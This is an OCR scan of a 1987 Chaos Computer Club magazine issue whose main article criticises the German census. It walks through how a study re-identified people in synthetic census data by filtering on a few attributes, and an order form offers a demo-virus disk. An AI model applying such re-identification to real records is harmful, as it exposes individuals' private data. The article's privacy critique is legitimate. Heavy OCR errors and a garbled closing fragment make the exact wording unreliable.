Textsystem; bedeutet ’in diesem unseren Lande*)
werden traditionel) Erhebungen durchgefuhrt, die
aufschlußreiche Daten zur Befriedigung des Infor¬
mationshungers der Behörden und der Wirtschaft lie¬
fern sollen. Bekanntlich wurde - nach großen öffent¬
lichen Protesten - die ursprünglich für 1983 vorgese¬
hene Volkszählung durch ein Urteil des Bundesver¬
fassungsgerichtes gestoppt und den Verantwortlichen
eindringlich klargemacht, zu welchen Bedingungen
eine künftige Zählung machbarsei;
Es sei zu "prüfen, ob eine Totalerhebung trotz einer
inzwischen fortgeschrittenen Entwicklung der stati¬
stischen und sozialwissenschaftlichen Methoden
noch verhältnismäßig ist'* (BVerfG’83, Seite 59).
Darüber hinaus bedürfe es einer "möglichst frühzei¬
tigen, faktischen Anonymisierung, verbunden mit
Vorkehrungen gegen eine Deanonymisierung"
DS Saite Viazeen
(BVerfG'83, S. 52/53). Interessant ist die Forderung
des Gerichtes nach öffentlicher sachlicher Informa¬
tion auch über die Art der statistischen Datenverar¬
beitung, "da Abschottung statt Information zu Mi߬
trauen und mangelnder Kooperaiionsbereiischaft
führen würde” (BVerfG'83, S. 54)
Jetzt stellt sich natürlich die Frage, was der CCC mit
der ganzen Sache zu tun hat, Nun. erstens interessiert
die Redaktion von vornherein alles, was irgendwie
nach Mißbrauch von Macht mittels des Werkzeugs
Computer riecht. Zweitens ist so ein Urteil des Bun¬
desverfassungsgerichtes Ja ganz nett, aber wenn die
Kontrollinstanzen fehlen, welche die Durchführung
eines solchen Urteils überwachen, ist Jedermann auf¬
gerufen, das Seine dazuzutun, um Schaden von die¬
sem unseren Volke abzuwenden. Drittens haben wir
im Rahmen des Chaos Communication Congress
1986 Material erhalten, das uns geradezu verpflichtet,
tätigzu werden.
Am Institut für Informatik der Universität Hamburg
wurden in den letzten Monaten umfangreiche Stu¬
dien durchgeführt, die zweifelsfrei belegen, daß die
mit der Volkszählung 1987 gewonnen Daten, entge¬
gen der eindeutigen Forderung des Verfassungsge-
richies, eben nicht Taktisch anonym’ sind, sondern
sehr wohl, und recht einfach, eine Identifizierung des
Dateninhabers ermöglichen. Den - wahrscheinlich
neuen * Begriff des DATENINHABERS benutzen
wir hier sehr bewußt, um deutlich zu machen, daß es
in einer Informationsgesellschaft auch ein Grun¬
drecht auf informationeile Selbstbestimmung geben
muß. Und das fängt eben damit an, daß jeder Einzel¬
ne selbst bestimmt, wer welche Daten über ihn sam¬
melt und benutzt.
Die unter der Leitung von Professor Klaus Brunn-
Stein durchgeführten Versuche zeigen erschreckend
deutlich, mit welch einfachen Mitteln es möglich ist,
aus den angeblich anonymisierten, d. h. nicht mehr
personenbezogenen Daten wieder personalisierte
Daten zu machen. Grundlage der Versuche war eine
künstliche Volkszählungsdatei, die ausschließlich
Daten enthält, wie sie bei der Zählung 1987 anfallen
werden, ohne die momentan laufende Siammdatc-
nerhebung bei den Hausbesitzern und Arbeitgebern
auch nur annähernd einzubeziehen, so daß letztlich
die Angaben, die jeder einzelne von uns macht, cs
ermöglichen, wieder auf jeden Einzelnen zu schlie¬
ßen.
Brunnsteins Studie zeigt einwandfrei, daß es mit
einem einfachen Werkzeug, wie dem Datenbanksy¬
stem DBase III unter MS-Dos, möglich ist, mit weni¬
gen Filtervorgängen ganz konkrete Einzelpersonen
aus einem Datenberg von 100 000 Datensätzen her¬
auszufischen. Bei 60 Millionen Datensätzen braucht
man halt nur eine größere Festplatte und entspre¬
chend mehr Zeit...
Wir wollen die Vorgehensweise zur Reanonymisie-
rungvon Volkszählungsdaten anhand eines Beispiels
deutlich machen: Ziclgruppe des Versuchs sind 46-
jährige Männer aus der Bürobranche- Unser erster
Schritt ist also konsequenterweise der, zuerst nach
dem Geburtsjahr zu filtern. Es bleibt eine Datei mit
915 Personen übrig, die 1940 nach dem Stichtag der
Volkszählung geboren wurden. Diese Datei filtern
wir nach dem Geschlecht und erhalten eine Datei mit
443 Personen, die wir auf das Merkmal Erwerbstätig¬
keit prüfen. Übrig bleiben 386 männliche Erwerbstä¬
tige von 46 Jahren. Bürokräfte haben die SchlOssel-
nummer78, also suchen wir jetzt danach und erhalten
eine Datei, die nur noch 26 Personen enthält. Wir
sollten uns dabei deutlich vor Augen halten, daß wir
nur drei Merkmale brauchten, um aus 100 000 Daten¬
sätzen einige wenige herauszufischen. Der nächste
Schritt besteht darin, die ’Wirtschaftsabteilung’ zu
sondieren. Wir erhalten elf Datensätze, die wir auf
das Merkmal Schulabschluß prüfen. Ergebnis; fünf
Volks- bzw. Realschüler. Zusätzlich fragen wir, wer
davon einen Berufsfachschulabschluß hat, übrig
bleiben drei Kandidaten.
Wir haben bislang erst sechs signifikante Merkmale
untersucht, werden aber trotzdem hinterhältig und
fragen uns: was wissen wir denn sonst so über die
Drei? Über das Merkmal 'gemeinsamer Haushalt’
können wir weitere Schlüsse ziehen (Das Volkszäh¬
lungsgesetz 1987 schreibt ausdrücklich vor, daß "die
Zusammenhänge zwischen Personen und Haushalt,
Haushalt und Wohnung, Wohnung und Gebäude . ..
festgehalten’* werden, was beim Gesetz zu Zählung
’83 nicht der Fall war). Wir könnten nun also noch
feststellen, daß Herr A ledig und religionslos ist und
in einem Einzcihaushalt lebt. Damit ist er nun aber
wirklich eindeutig reanonymisiert, denn B und C sind
verheiratel und über ihre Ehepartner eher noch leich¬
ter reanonymisierbar. Zusammen mit der Tatsache,
daß auch eine Information vorhanden ist, anhand de¬
rer der sogenannte Block des Dateninhabers fest¬
stellbar ist (Blöcke sind die kleinste Einheit von Da¬
tensatzmengen. Sie begrenzen die Datensätze von
Personen, die in einer Straßenfront zwischen zwei
Einmündungen von Nebenstraßen wohnen), wird
nun leicht vorstellbar, warum Herr A spätestens 1989
Werbung von einem Heiratsvermittler bekommt,
während Herr B davon verschont bleibt.
Der Forderung des Bundesverfassungsgerichts wird
also mit der Volkszählung 1987 in keiner Weise
Rechnung getragen. Faktische Anonymisierung be¬
deutet nunmal, daß eine Reanonymisierung nur mit
unverhältnismäßig hohem Aufwand möglich sein
darf. Schon durch die Art der erhobenen Daten wird
eine Entscheidung, die unsere höchste verfassungs¬
mäßige Instanz getroffen hat, schlicht ignoriert. Ab¬
schließend noch einige Zitate aus der Studie, die wir
unkommentiert lassen, da sie für sich sprechen:
"Bei diesen Ergebnissen ist zu berücksichtigen, daß
wesentliche Merkmale der Volkszählung, die eine
Identifizierung noch erleichtern, etwa die Adresse
des Arbeitgebers oder der Ausbildungsställe, in den
Re-Identifizierungs-Versuchen nicht einmal benutzt
wurden."
"Erstens: Es gibt kaum Personen innerhalb des Da¬
tenbestandes. die nicht anhand der über sie gespei¬
cherten Merkmale re- identifizierbar wären.
Zweitens: Mehr als die Hälfte aller Erwerbstätigen
können schon mit wenigen Merkmalen ... re-identi-
fiziert werden” . .da die Organisation der Statistik
als interne Aufgabe der Exekutive angesehen wird,
gibt es praktisch keine Kontrollinstanz..
"So sind die Präsidenten der Statistischen Ämter die
letzten wahren, weil unkontrollierten Könige dieser
Republik."
Alle Zitate und das Re-Identifizierungsbeispiel
stammen aus; "Mitteilung Nr. XX über Möglichkei¬
ten derRe-ldenlifikation von Personen aus Volkszäh-
lungsdatcn" von Klaus Brunnstein, Hamburg; De¬
zember 1986.
(Die Studie sowie Beispieldaten und die Re-Idenfi-
kationsprogramme können über die DATEN-
SCHLEUDER-Redaktion bezogen werden).
goblin
Dirk aus Berlin, der an der Diskussion
Samstag Nacht auf dem CCCongress
teilgenommen hat: die Moderatorin
möchte Dich treffen. Bitte hinterlass
Deine Tel-Nr. für Ingrid beim AL-
Buero 861 4449.
OLttS% 32 i* Bereitschafiipolizei - heute — 12/86
Radio Bremen ist auf dem CCCongress’86 eine Vi-
deocassette (Umatic) abhanden gekommen. Erken¬
nungsmerkmal: Kassette ist zu groß für VHS-Rekor-
dcr. Mögliche Finder bitte während der öffentlichen
Chaosdien.stzeiten Di-Do 12-15 unter 040-490 37 57
melden.
sffiHackersels
(So lange der Vorrat reicht)
CPM-Portable EPSON PX8, 54 KB, Microcassette,
Display 80* 11, mit Akku und Garantie aus Sonder¬
posten DM 870,- für CCC-Mitglieder (notfalls
gleichzeitig beantragen)
Versand erfolgt als Wertpaket nach Eingang eines V-
Schecks an den CCC, LS PX8, Schwenckestr. 85,
IMPRESSUM
^ic Sn<ciiSd)lciii>ct Numero 18
Das wissenschaftliche Fachblatt für Datenreisende
D-2000 Hamburg 20 Schwenckestrasse 85
Geonet: Geol:Chaos-Team
Btx : *655321#
Herausgeber und ViSdPO:
Herwart Holland-Moritz
Milurbeiler (u.a.): R. Schnitzki, S. Wernery, A.
Eichler, P. Frunck, H. Gruel, M. Kuehn, Esco, Andy
M.-M., S. Stahl, padeluun. KS, jwi, D. Wititschnig,
Poeironic; Rhein/Muin: Erich Eugelier sowie die
iiiigenunnten Gclieimnistriigcr.
(e) 1987 bei der Redtikiion und den Autoren
Vieirarb-Kartüffeleigendruck ini Selbstverlug.
Feliruiir 1987 - Made in Eile
DS Saite FQmfzeen
WIKG
.. ^
2. WInschaflsKriminalitätsGesetz/.v^m
(9^
&■]
Da das 2.WirlschaftskriminaIitaisgcsclz (WIKG) zum
ersten August’86 in Kraft trat, war es natürlich Ge-
sprSchsgegenstand eines CCCongress-Workshops. Un¬
ter Leitung des BHP’lers Sponti wurde über die Aus¬
wirkungen und die Zukunft der Hacker diskutiert. Einig
war man sich, daß NUI-Mißbrauch als "Täuschung im
Datenverkehr'' strafbar, und es noch unklar ist, wo die
Grenze zu ziehen ist zwischen Daten, welche legal ab-
gerufen werden können, und denen, welche nicht legal
abrulbar sind.
Ist beispielsweise das Prompt, oder die Meldung, um
wessen System cs sich handelt, bereits sicherheitsrcle-
vant? Ist eine normale ID & Paßwort-Sperre bereits als
"besonderer Schutz“ zu verstehen? Wichtig auch die
Information, daß die ALTOS-Box jedes Einloggen und
Ausloggen is Vorgang mit allen dabei anfallenden Da¬
ten protokolliert, bislang nur zur Ausmerzung von
Software-Bugs, in Zukunft aber - mit Zustimmung der
Firma ALTOS, der wohl nichts anderes übrig blieb ■ auf
Veranlassung der Behörden, nachdem eine Ruckver¬
folgung stattfand, bei der sich jemand mit einer Leih-
NUI bei ALTOS eingcloggt hatte.
Um die Argumentation der Juristen und die Auswir¬
kungen und - legungen des 2.WIKG genauer kennen-
zulemen, bitten wir jeden, der aufgrund des 2.WIKG in
Schwierigkeiten gerät, sich bei uns zu melden, damit wir
uns informieren können.
Auf der Veranstaltunfg wurde auch die Auffassung ver¬
treten, daß die Hacker - als kleine Fische - Studien- und
Übungsobjekte der LKA’s sind, die daran Erfahrungen
sammeln für die Bekämpfung wirklicher Wirtschafts-
ktimincllcr. Dcizciüger Stand der Dinge sei zwar, daß
die meisten Ermitüungsbeamten bei Hausdurchsu¬
chungen wenig bis gar keine Ahnung hätten (so kam cs
vor, daß leere Diskettenhüllen und -schachteln mitge¬
nommen wurden), daß aber die Beamten in den LKA's,
die dann den Fall wciterbcarbciten, sehr wohl wissen,
was sie tun. Man sollte also nicht auf deren Unkennmis
setzen!
Ls III
Schon war’s
Falschgeld in TEMPO
DaßderCCC fürdie PARLAKOM-Studievom Bun¬
destag 38.000 DM erhalten habe, wie die Zeitschrift
TEMPO es darstellte, ist leidereine Ente, Zur Sanie¬
rung der Clubfinanzen wäre die Summe durchaus
hilfreich. Das Foto zu dem TEMPO-Artikel (ohne
Unterschrift und Quelle) zeigt auch nicht die ISDN-
Baustelle im Bundestag, sondern die bewährte Tele¬
fonzentrale des Chaos Communication Congress.
Ferner ist richtigzustellen: Bei der Erarbeitung der
Studie waren "nur" Leute aus dem CCC und dem
Arbeitskreis Politisches Computern (APOC) beteiligt,
die eine mögliche Computer-Wende der Grünen gei-
sligmoralisch zu unterstützen versuchten. (Die Studie
kann von derDS-Redakt/on bezogen werden).
Js5
Wiiis-cluifi.sspionaue
British Telecom Is Watching You
München (bhp/ds) - Vertrauliche geschäftliche In¬
formationen über europäische Induslriefirmen, er¬
langt durch Überwachungszentren der US-Amerika-
nischen Streilkräfte in Europa, werden an konkurrie¬
rende Firmen in den USA übermittelt. Dies geht aus
einem kürzlich veröffentlichen Buch zu diesem The¬
ma hervor.
Der Verfasser, ein früherer Mitarbeiter der US-Luft-
waffc, beschreibt darin, wie die Telekommunikation
in mehreren Staaten der Europäischen Gemeinschaft
überwacht wird und wie den US-Firmen fertig aufbe¬
reitete Informationen zugänglich gemacht werden.
Dieser Teil der Überwachung überwiegt demnach bei
weitem das Abhören des sowjetischen Miliiärfunk-
Verkehrs, beschreibt Duncan Campbell in seinem
Buch "The Unsinkable Aircraft Carrier" (der un¬
sinkbare Flugzeugträger: d. Übers.). Tom ütlerick,
Abgeordneter des britischen Parlaments, beschuldig¬
te daraufhin «iie Vereinigten Staaten der "Wirt¬
schaftsspionage”.
"Die wichtigste Station für die gegenseitige Sicher¬
heit in der Welt", so ein früherer Direktor der US Na¬
tional Security Agency, liegt in Menwith Hill in der
Grafschaft Yorkshire, Großbritannien. Einige 10.000
Telefonleitungen laufen dort zu der nahegelegenen
Relaisstation der britischen Telefongesellschafl Bri¬
tish Telecom. Menwith Hill wird außerdem durch
einen Hohlleiter versorgt, der bereits vor seiner Mo¬
dernisierung vor zwei Jahren eine Kapazität von
32.000 Telefongesprächen gleichzeitig hatte. Gro߬
britannien ist einer der Hauptzugänge für Daienlei-
tungen von Ost- und Westeuropa nach Afrika sowie
Nord- und Südamerika. Die "Spezialität" der Station
in Menwith ist das Anzapfen der fest gemieteten
Standleilungen der europäischen Postverwaltungen.
Nahezu der gesamte internationale Datenverkehr,
Nachrichten, Telegramme und Telefongespräche von
Firmen, staatlichen Institutionen, der Ober Großbri¬
tannien läuft, wird überwacht und ausgewertet. Die
Mehrzahl der ausgewerteien Informationen werden
an das Hauptquartier der NSA in Fort Meade, USA,
weitergeleitet.
Europas schwache Position in diesem Spiel wird
noch zusätzlich verdeutlicht durch den Kommentar
eines Amerikaners zu diesem Thema: "Nicht einmal
wenn sie wollten, könnten die Verbündeten davor si¬
cher sein.‘Sie arbeiten alle mit Geräten, die sic von
uns bezogen haben.”
Aus: l'M, Informatfon Market, Ausgabe 46. Dcc. 1986- Feb. 1987
Hrsg .; Commission of the European Communities.
ds-Abdruck mit freundlicher Genehmigung der BHP.
i^ic Sft(ett$tf)rcuber
Hacking 0 ^, BiFu
Bombenstimmung beim CCC’87 Bild und Funk auf dem CCC’86
Ein Kameramann von Radio Bremen - er sucht hinter
einem Elektrokaslen mühsam Deckung - steht im nie-
selnden Schncematsch und betet: "LieberGott,mach
bitte, daß sie hochgeht. Bitte, lieber Gott, ich werde
mir auch einen zweiten TAZ-Aufkleber auf die Ka¬
mera kleben."
Er ward nicht erhört.
Mitten in der großen VIRUS-Diskussion während
des CCCongresses hatte ein Unbekannter in REAL
HACKING-Manier einen Virus eingcschleust: tele¬
fonisch gab er bekannt, daß jeden Augenblick eine
BOMBE hochgehen würde. Von Anfang an der La¬
cher des Abends. Das Haus wurde aus juristischen
Gründen mal eben kurz geräumt, das Chaos-Team
durchkämmte mit einem Mienensuchroboter (20 cm
hoch, ferngesteuert, bei Karstadt für 35 Mark) den
zweiten Stock. Kleinere Aufregung bei der Räumak¬
tion gab es erst, als ein heimlicher Verbündeter des
Anrufers - ebenfalls in REAL HACKING-Manier -
ein bis zwei Luftballons explodieren ließ. - Was ha¬
ben wir uns alle erschrocken.
Draußen im Regen gings dann ab. In ausreichendem
Sicherheitsabstand von zwei Metern zum Eidelsted-
ler Bürgerhaus begannen sich Trüppchen zu bilden
und ihre Ansichten zur Virusfrage mit harten Banda¬
gen auszulauschen. Endlich war die trennende Stuhl-
reihen- und Bühnensituation überwunden. Hier bra¬
chen die wohlhabenden Peripherie-Besitzer weinend
zusammen: "Ich will keinen Virus auf meiner Fest¬
platte", während bescheidene Equipmentbesitzer
triumphierten, daß der Virus ihrer Daiaseiie (schon
wieder ein Riesenlacher) kaum etwas anhaben könne.
Der Sicherheitsabstand zum Haus schrumpfte auf 50
Zentimeter. Die Kripo hatte die Bombendrohung
nicht ernst genommen, aber aus technischen Grün¬
den sollten erst noch einmal alle draußen warten.
Kurz danach ging das Gerücht um, daß sich der
Chaos-Helfer an der Lauisprecheranlage derart in
Panik gcschrien hätte, daß er erst nach einigen kräfti¬
gen Ohrfeigen aufhörle, "Hilfe, Panik, alle rau.s!" zu
schreien. Er hatte anschließend das gesündeste Aus¬
sehen von anen(rote Bäckchen...).
Das Frösteln wurde langsam unangenehm und jeder
versuchte, sich warmzureden. Zum lOOsten Mal wur¬
de der Satz des Tages zitiert: Ich bin nicht gegen Ge¬
setze, ich lasse sie nur außer acht. Darauf aufbauend,
versuchten die Hintersten zuerst, in das warme Haus
vorzudringen. Einige versuchten reinzukommen, in¬
dem sie sich (Real Hacking!) als Chaos-Dienst aus-
gaben, halten aber nicht mit dem Real Serum (sprich
ECHTEM Chaos-Dienstler) an der Tür gerechnet.
Drin explodierte ein weiterer Luftballuun (sind wirk¬
lich wie Zeitbomben; sie finden ihre scharfe Ecke von
alleine) und endlich gab Asterix die Tür wieder frei.
Der Kameramann (ein besonders guter Mensch, weil
er ja einen TAZ- Aufkleber auf der Kamera hatte)
warein wenig traurig. Live- Explosionen lassen sich
nämlich immer ganz prima an die Tagesschau ver¬
kaufen (je mehr Tote, desto besser...). Aber da er ja
kein Zyniker ist, war er natürlich auch ein bißchen er¬
leichtert.
Dies war ein Beitrag über Bombendrohungen. Und
über REAL HACKING. Über Viren steht hiernichts.
Weiterblädern. padeluun
Siltcn3dr;fctt))ct:
Wie in jedem Jahr auf dem Chaos Comunication
Congress waren die Funkamateure wieder mit Bild
und Funk vertreten. Schwerpunkte wie Packet Radio
wurden in vorausgegangenen DATENSCHLEU¬
DERN ausführlich abgehandelt.
Erstmals auf einem CCCongress war die Amateur¬
funkfernseh- Empfangsanlage (ATV-Anlage), die von
DLIHK zur Verfügung gestellt worden war. Im we¬
sentlichen besteht .sowas aus einer Antenne für das 23
cm-Band, einem Converter, der die Signale ins nor¬
male TV-Band umsetzt und einem Fernseher mit Ka-
bcltuner. Mit dieser Mimik gelang es (trotz schlechter
Antennenlage), ein verwertbares Farbbild vom ATV-
Relais (Sendeleistung nur ca. 30 Watt) auf den Screen
zu bekommen. Dazu war nichtmal ein Composter nö¬
tig!
Wenn kein Amateur über das Relais arbeitet, sendet
es automatisch einen aktuellen Ausschnitt vom Mc-
teosat-2-Wetterbild im Wechsel mit einem Testbild
odereinem Außenbild einer Kamera, die beim Relais
angebracht Ist.
Der eigentliche Witz des Relais liegt darin, daß auch
ein Amateur, der selbst keine Bildübertragung ma¬
chen kann, sich mit einem 70 cm-Funkgerät auf den
Tonträger aufschalten und so seine Kommentare zu
den gezeigten Bildern abgeben kann. DCl XI war so
frei, während der Veranstaltung als Ansprechpartner
zu dienen und sozusagen auf Abruf eine Slalionsbe-
schreibung (im Hackcenter herrscht gegen den Ka¬
belsalat richtig Ordnung) live einzuspielen oder Ama¬
teur-Videotapes zu senden. Krieg der Sterne zeigen
ist zwar ohne weiteres machbar, aber nicht erlaubt
(AFuG,(c) und so).
Fürden CCC'87 hat DCIXI in Aussicht gestellt, ent¬
weder vom Congress live zu senden (so die Technik
will), oder aber kurze Tapes von zu Hause einzuspie¬
len. Mal sehen ob’s klappt - frei nach dem Motto:
Hier ist (DLO)CCC mit eigenem TV-Programm.
Quartierisch
Abenteuerurlaub in der Hafenstraße
Zu Verwicklungen kam es bei der Organisation der
Übernachtungsmöglichkeiten für den CCC’86. Da
die ursprünglich vorgesehenen Räumlichkeiten des
CVJM nicht mehr mietbar waren, wurde die städti¬
sche Wohnungsverwaltung SAGA angerufen. Das
Telefonat, sinngemäß: "Der CCC brauchte für einige
seiner vorwiegend jugendlichen Gäste Übernach¬
tungsplätze. Da die geplante Unterbringung nicht
möglich ist, dachten wir daran, unseren Congres-
sTeilnehmerlrnen ein anderes Stück Hamburg zu
zeigen, eine Art Kurzabenteuerurlaub. In Ihren Häu¬
sern an der Hafenstraße stehen ja zumindest vier
Wohnungen leer, die kürzlich geräumt wurden. Für
die Dauer des Congresses würden wir gern ein paar
unserer Gäste ln der Hafenstraße einquartieren. Da
der Congress nur zwei Tage dauert, ist mit Räumung¬
sproblemen nicht zu rechnen."
Die Absage bestand aus einer Unbewohnbarkeitser-
kJärung, Darauniin wurde die Jugendherberge am
Hafen angesprochen; ein Dank für die Unterstüt¬
zung, die den Gästen dort zuteil wurde.
DS Saite SiflbzMfl
OSSateSädizaen
NetzWorkShop
ln einer nächtlichen Sitzung trafen sich rund 30 Teil¬
nehmerinnen des CCC’86 zu einem Workshop, um
Realisierungsmöglichkeiten alternativer Computer¬
technik und offener Netze zu besprechen.
Als ein gelungenes Beispiel wurde die Berichterstat¬
tung der Bayrischen Hackerpost (B.H.P) gewertet.
Die B.H.P. hatte bereits zwei Tage nach dem atoma¬
ren Katastrophe in Tschernobyl aktuelle Meßdaten
über den Verstrahlungsgrad in Teilen der Bundesre¬
publik durch die Mailboxen-Szene geschickt. Dar¬
über hinaus wurden Hintergrundberichte angeboien,
die die Bedeutung von Fachbegriffen und Meßgrö¬
ßen erläuterten.
Praxis in der Erprobung
Die Grenzen der elektronischen Kommunikation sa¬
hen die meisten Teilnehmer zunächst bei den relativ
hohen Kommunikalionskosten. Eine Situation, die
sich durch die Erhöhung der Benutzergebühren für
Datex-Pnoch verschärfen wird. Einer der Teilnehmer
fühlte sich unter einem "Haufen Fachidioten", die
über Perspektiven sprechen, an denen er aus finan¬
ziellen Gründen nicht leilhaben kann. Auch vor die¬
sem Hintergrund wurde die Notwendigkeit betont,
lokale Mailboxen, die von Privat betrieben werden,
inhaltlich und strukturell zu unterstützen.
Versuche in dieser Richtung werden derzeit mit der
Hamburger C.L.I.N.C.H.-Box angegangen. Seit
Sommer 1986 betreibt CCC- Mitglied Reinhard
Schrutzki eine Mailbox, die trotz einiger Mängel für
inhaltliche Arbeit geeignet erscheint. Die
C.L.I.N.C.H.-Box dient derzeit den Redaktionen des
Genethischen Informationsdienstes und der DA¬
TENSCHLEUDER als "hauseigener Nachrichten-
Vermittlungsrechner”. Der Arbeitskreis für politische
Computeranwendung (APOC) wickelt über diese
Box Koordinierungsaufgaben ab und bietet tm Brett
"Politik" Kurznachrichten zu aktuellen Entwicklun¬
gen aus dem Bereich alternative Computeranwen¬
dung an.
Auf größeres Interesse stößt auch das Brett "Forum".
Das für inhaltliche Diskussionen eingerichtete Brett
bezieht sich derzeit überwiegend auf Themen aus
dem Umfeld des CCC. Immerhin konnte an einem
kleinen Beispiel demonstriert werden, was Mailbo¬
xen in der Praxis leisten können. Mitglieder der
APOC hatten eine Diskussion über die Passfotos und
Sicherheitskärtchen auf dem Kongress angezcttclt.
Sie kritisierten, daß alle Besucher verpflichtet wur¬
den, solche an den Überwachungsstaat erinnernde
Ausweisezu tragen. Sie schlugen vor, daß Besuchern
lediglich ein Eintrittsstempel verpaßt wird, ver¬
gleichbar mit dem Verfahren "jeder mittelmäßigen
Disko". Dieser Vorschlag wurde schließlich prakti¬
ziert. Der Prozess der Entscheidungsfindung, schrift¬
lich dokumentiert, konnte während des Kongresses
nachgelesen werden.
Elektronischer Schnellfick
Wau Holland machte während des,Workshops deut¬
lich, daß sich durch die Schnelligkeit des Mediums
bereits im kleinen Kreis neue Informations- und Ent-
scheidungsclitcn herausbilden.
Darüberhinaus brächten Mailboxen auch Informa-
tionsüberflutung sowie Beschleunigung, Verflachung
und Ver-Rechtlichung zwischenmenschlicher Bezie¬
hungen hin zum elektronischem Schnellfick.
DS Saite Achzeen
Wer deshalb oder anderen Gründen nicht am "elek¬
tronischen Vertrauenskreis" teilnehmen könne oder
wolle, sei von Enlscheidungsprozcssen abgeschnit¬
ten. Kritisch würde diese Situation vor allem, wenn
innerhalb der Boxen Diskussionen über Personen
oder soziale Strukturen entstehen, ohne den direkt
oder indirekt davon Betroffenen die bislang üblichen
Möglichkeiten zur Reaktion zu gewähren.
Die neue Qualität der Mail box sei unter anderem ihre
Zwitter-Rolle als privates und gleichzeitig öffentli¬
ches Informationssystem. Zudem sind seien einer¬
seits so flüchtig wie Radiowellen, andererseits als
Papierdokumente (Ausdrucke) archivierbar.
Die Praxis zeige, wie wichtig es ist, die Konsequenzen
verbreiteter Informationen zu bedenken. Es stelle
sich immer wieder die Frage, welche Informationen,
zu welchem Zweck, wann an wen wie und über wel¬
chen Informationsweg weilergegeben werden.
Jürgen Wieckmann wertete die Aktivitäten auf der
C.L.I.N.C.H.-Box als längst überfälligen Experimen¬
tierraum, der "uns endlich die Möglichkeit gibt, un¬
sere theoretischen Vorstellungen anhand der Praxis
zu überprüfen und weiterzueniwickeln."
Voraussetzungen für Perspektiven
Mehrfach kam die Anregung, vergleichbar mit den
Viodeoläden der 70er Jahre Computerläden aufzu-
baucn, die eine praxisorientierte, alternative Compu¬
teranwendung erproben sollen. Aufgabe dieser Com-
puterläden sei unter anderem, anwenderorientiertes
Wissen zu vermitteln und Interessenten anhand refe¬
rierbarer Projekte dazu zu befähigen, das Medium
zur Umsetzung eigener Interessen sachgerecht ein¬
schätzen zu können. Darüber hinaus gelle es, das
Wissen über Informalionsvcrbreitung und Informa-
tionsbeschaffung als kulturelle und politische Aufga¬
be zu begreifen.
Die Computerläden hätten vor allem die Aufgabe,
inhaltliche Arbeit bestehender Gruppen durch Com¬
putertechnik zu stärken und dabei auch die medien-
spezifische Eigenheiten des Computers im positiven
Sinne zu nutzen. So habe die Videoszene eine Video¬
kultur hervorgebracht, die neue Sehformen, Produk¬
tionsweisen und Bildgestaltungen hervorgebracht
habe. Ein solcher Ansatz fehle der Computerszene
bishervöllig.
Im Februar wird es im Rahmen einer Zukunftswerk-
statt ein Treffen interessierter Kreise geben (siehe
Termine an anderer Stelle im Heft), die ergebniso-
rientierte Konzepte zu solchen Ideen erarbeiten und
vorstellen wollen. Diese Konzepte sollen auch
Grundlage sein, um Anlauffinanzierungen durch die
öffentliche Hand zu beantragen. jwi/(ls5)
Sdtcn^ifjrcubcr
Beslelltetzen IBei Bedarf abbeissen und ausgefültt einschicken ( am besten an uns)) ^
Jaiajajaaa- ich möchte versuchen, die folgenden Sachen von Euch zu bekommen: {.
20,00 DM Einmalige Aufnahmegebühr für den Chaos Computer Club
60,00 DM Mitgliedschaft im CCC für ein Jahr für Schüler, Söjdenten und ähnliches
120.00 DM Mitgliedschaft im CCC für ein Jahr für Normaluser
230 00 DM Ich will mehr: fördernde Mitgliedschaft im CCC für ein Jahr
2 50 DM Probeexemolar der DATENSCHLEUDER, frankierten Rückumschlag beilegen
An //ff 30.00 OM Sozialabo der Datenschleuder ftir ein Jahr (Schüler, ptpapo)
ßO OD DM Standardabo der Datenschleuder für ein Jahr
yji 120,00 DM Ich will mehr (bezahlen); Förderabo der Datenschleuder für ein Jahr
3.33 DM 10 Aufbacker’Kabelsalat ist gesund* , Standardausführung
3 33 DM 1 Din A4 - Bogen Aufbacker 'Achtung Abhörgefahr', ungeschnitten, postgelb
25.00 DM Infopaket 1: Computerviren I MS-Dos Disk 170k mit Demovirus und
munteren 10Okß Dokumentatiön zum Thema Viren
25.00 DM Infopaket 2 : Volkszählung & Reidentifikation 2 MS-Dos Disks 1 ?0k mit
Beispieldaten (künstliche Bürger). DBaselll - Programmen zur Reidentifi-
_ kation und 17 Seifen Gebrauchsanweisung
?.?? DM Porto. Verpackung, Trinkgeld, Bussgeld, Spenden etc ,
Die Kohle liegt bei als: Briefmarken <= 0.80 DM V-Scheck Blankoscheck (lechz) Bar
i ^uS'etfendes ma/ideren. Mchtzuüe^endes Zöschen, oder senff^'äs/
Nur für zukünftige Mitglieder:
Ich zahle meine Mitgliedsbeiträge jährlich halbjährlich vierteljahriich styndlich
^undzwar bar per V-Scheck Überweisung
Ihr dürft abbuchen {Einzugsetiaubnis liegt bei)
Überweisungen bitte an : Postgrrosamt Hamburg, 59 90 90 - 201 . Chaos Computer Club e.V.. Hamburg
Nur für zukünftige Maiiboxbenutzer:
Ich will Benutzer der CUNCH - Box werden (5.00 DM, bzw 2.00 DM / Monat, keine Zeitgebühren) | |
Ich will Benutzerder INFEX - Box werden (8.00 DM/Monat Mindestnutzung + Zeitgebühr) I I
{Gewünschtes S!>-Ftem markieren, itnteriagtn werden zegesandt)
Personenbezogene Daten ab hier eintragen:
{Angaten auch machen, wenn AdresskJeter tetgHüst, fai/s Adresskieber/ehH: i.OODMBussgeid)
Ort.Datum,Unterschri1t |
Clisos Computer Club e.V.
Kto 59 90 90'201 PGirosA Hmb
Schwenckestrasse 85 2000 Hamburg 20
040 / 490 37 57 GEOMET&CUNCH: CHAQS-TEAM
f^ic ^iticnödjkiibct:
Die-DalenschleuderNr. 18 ' reljruarl987 ’ Postvenriebsslück C 9927
F ■ Geb. bez.
Wenn unzustellbar
Anschriftenausschnitt bitte
mit neuer Adresse zurück
DM 2^0
1 i I I ii I Mi 1 ij Yv
\ |: Das wissenschaftliche FachÖIatt flir Datenreiiende 0/
t |j Organ C^aos Computer Club |l \
mh 1 I Ii I 111
Postvertriebsstück
C9927f :
! ' i
Die Datenschleuder Nr. 19
M I
1 Apiiil 1987
I i i I
i !’ 1
i'Wt .V
CeBil:
\ ; CDHPIS, CUHST, CRflWfiTTEH
ÖIGfiBESTELLBLflTT
Volkszählung!
Stelle /
ta meXclber ^ verB^rgeue im& geb^W^
Ur$ccbnt m^ €tgett^ic^dfti^
imt]& go^Iett vmb SReefymn^
9orge#teIIt mer^*
fleli ^u ber seit
ba 6 «I« ®«bot auffllrtß, oo«
bem Slalfer ^tuguftu^, toele^e«
i«r erften asolfittötuna fU^irte.
Xia bte batnangen @X)93«
Unlagert ^entratlflert InftalCUrt
tcareti, unb l?lre aSernetiHng
